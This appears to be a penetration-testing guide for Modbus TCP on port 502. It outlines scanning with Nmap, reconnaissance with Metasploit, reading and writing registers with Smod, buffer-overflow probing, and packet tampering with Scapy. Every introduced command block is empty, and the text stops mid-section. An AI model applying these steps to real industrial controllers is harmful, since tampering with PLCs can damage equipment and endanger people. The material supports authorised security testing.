Modbus - Port 502

Basic info

Modbus is a communication protocol used in industrial automation to allow devices like programmable logic controllers (PLCs) to talk to each other. It operates in a master-slave setup, where the master queries and controls multiple slave devices. Port 502 is typically used for Modbus TCP/IP, making it a key target for penetration testing to find security weaknesses.

Worflow

• Scan for Devices: Use Nmap to find devices listening on port 502.

• Fingerprint the System: Use tools like Metasploit’s Modbusdetect module to learn about the Modbus version and capabilities.

• Check Security Features: Test if the system requires authentication, as many Modbus implementations do not, allowing anyone to issue commands.

• Test Function Codes: Explore Modbus function codes (like 0x01 for Read Coils) to see if they can read or write sensitive data.

• Look for Exploits: Check for buffer overflows by sending oversized requests and test for man-in-the-middle attacks, given Modbus traffic is often unencrypted.

Unexpected Detail: Lack of Encryption

An interesting point is that Modbus communication is usually unencrypted, meaning an attacker can easily intercept and modify messages, increasing the risk in industrial settings.

Scanning for Devices

Start by using Nmap to scan for Modbus devices on port 502. Run this command:

This will help identify devices and gather initial information.

Initial Reconnaissance

Use Metasploit for deeper reconnaissance. First, detect the Modbus service:

Then, enumerate unit IDs:

Interacting with Devices

Install and use Smod for detailed interaction. Clone and run it:

Connect to the device:

Enumerate function codes and read/write registers, e.g.:

Exploiting Vulnerabilities

Check for buffer overflows by sending oversized requests in Smod. For man-in-the-middle attacks, capture traffic with Wireshark:

Then, use Scapy to modify and resend packets: